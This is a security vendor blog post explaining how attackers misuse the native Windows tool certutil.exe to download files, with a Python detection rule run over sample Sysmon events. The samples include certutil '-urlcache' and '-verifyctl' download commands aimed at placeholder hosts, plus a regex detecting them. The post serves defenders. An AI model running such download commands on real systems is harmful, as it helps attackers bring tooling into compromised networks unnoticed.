How LOLBAS Is Used in MS Process Abuse – Security Spotlight

The “Security Spotlight” blog series provides insight into emerging cyberthreats and shares tips for how you can leverage LogRhythm’s security tools, services, and out-of-the-box content to defend against attacks.

In this Security Spotlight, we’ll be talking about LOLBAS and highlighting one example of attackers using this technique to accelerate time to breach (MITRE ATT&CK® Technique T1105).

What Is LOLBAS?

Living Off the Land Binaries and Scripts (LOLBAS) is a common method of attack employed by malicious actors. Its basic principle is to use tools already present on a standard operating system, either shipped natively or installed from trusted sources, as the primary means of carrying out an attack.

Attackers often adopt this approach after an initial exploitation to gain a foothold within the environment before introducing tooling from the outside to execute even more malicious activities. Commonly employed executables that can be used to do this include cmd.exe, explorer.exe, and msconfig.exe.

Notably, the LOLBAS project aspires to compile a comprehensive list of every binary, script, and library that can be harnessed for Living Off the Land techniques and map them to the MITRE ATT&CK® framework, making it a truly valuable resource!

How Attackers Use LOLBAS To Accelerate Time To Breach

The example we’ll be using involves certutil.exe, a native Windows component and a part of Certificate Services. This service operates by receiving requests for new digital certificates over transports like RPC or HTTP, then checking these requests, setting certificate properties, and finally, issuing the certificate.

However, in our scenario, rather than assisting in this process flow, an attacker hijacks the certutil.exe process to download files from a specified URL. This enables the attacker to transfer their tools or other files from an external system directly into the compromised environment. To make matters worse, they can do this without triggering alerts from monitoring technologies since the process being used is native to the platform. This allows attackers to hide in plain sight.

This phenomenon certainly isn’t new. In fact, the term Living Off the Land was first introduced by Christopher Campbell and Matt Graeber during DerbyCon 3 nearly a decade ago.

A recent instance of this certutil.exe misuse, confirmed by MITRE ATT&CK®, can be seen in part of an attack write-up by Trend Micro. This attack concerned the DRBControl cyber espionage campaign targeting gambling companies running throughout 2020 and 2021. Similar cases regarding certutil.exe misuse date back to 2017, though other process misuse cases likely heavily predate that.

How Can LogRhythm Help You?

The Log Observed rule crafted by the Analytic Co-Pilot team detects instances where the certutil.exe process is used together with a URL matched by a regular expression (regex). A match indicates communication with an external URL resource, which may signal a potential problem.

However, there are cases in which the process establishes URL connections for legitimate purposes. Hence, to refine this rule and reduce false positives, you could update the regex pattern to also require the terms “urlcache” or “verifyctl”. These verbs signify an attempt to download content from the stated URL, which helps distinguish potentially malicious activity from routine use.

Finally, as with most Windows rules, this rule is triggered more easily when Sysmon logging is enabled.
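As an added illustration (not LogRhythm's rule or code), the base rule and the refined rule described above are expressed below in Python and run over constructed Sysmon-style process-creation records. Field names follow Sysmon Event ID 1 (Image, CommandLine); the hostnames and file names are placeholders.

```python
import re

# Constructed Sysmon Event ID 1 style records, reduced to the two fields the
# rule needs. Sample values only; hosts use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache http://files.example.invalid/t.bin t.bin"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -verifyctl http://files.example.invalid/x.cab"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -URL http://crl.example.invalid/ca.crl"},  # URL, no download verb
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -verify -urlfetch cert.cer"},  # no URL at all
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo http://intranet.example.invalid"},  # URL, wrong process
]

URL_RE = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)
# The two certutil verbs the post names as download indicators.
DOWNLOAD_VERB_RE = re.compile(r"(?:^|\s)[-/](?:urlcache|verifyctl)\b", re.IGNORECASE)

def is_certutil(event: dict) -> bool:
    """Anchor on the process image rather than the command-line text.
    (If your log source carries Sysmon's OriginalFileName field, that is a
    more robust anchor, since it survives a renamed binary.)"""
    return event["Image"].lower().endswith("\\certutil.exe")

def broad_rule(event: dict) -> bool:
    """Base rule from the post: certutil.exe with any URL in its command line."""
    return is_certutil(event) and URL_RE.search(event["CommandLine"]) is not None

def refined_rule(event: dict) -> bool:
    """Refined rule: additionally require the urlcache or verifyctl verb."""
    return broad_rule(event) and DOWNLOAD_VERB_RE.search(event["CommandLine"]) is not None

def evaluate(events: list) -> dict:
    """Return the event indexes each rule fires on, for side-by-side comparison."""
    return {
        "broad":   [i for i, e in enumerate(events) if broad_rule(e)],
        "refined": [i for i, e in enumerate(events) if refined_rule(e)],
    }

if __name__ == "__main__":
    for name, hits in evaluate(SAMPLE_EVENTS).items():
        print(f"{name:8s} fired on events {hits}")
```

On the sample set the broad rule also fires on the benign CRL fetch (event 2), while the refined rule fires only on the two download-verb cases.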

For more information on how to enable these rules within your LogRhythm deployment, check out our community page to read more, download, and then import the rule into your platform.

For other Security Spotlight episodes, you can access the full playlist here.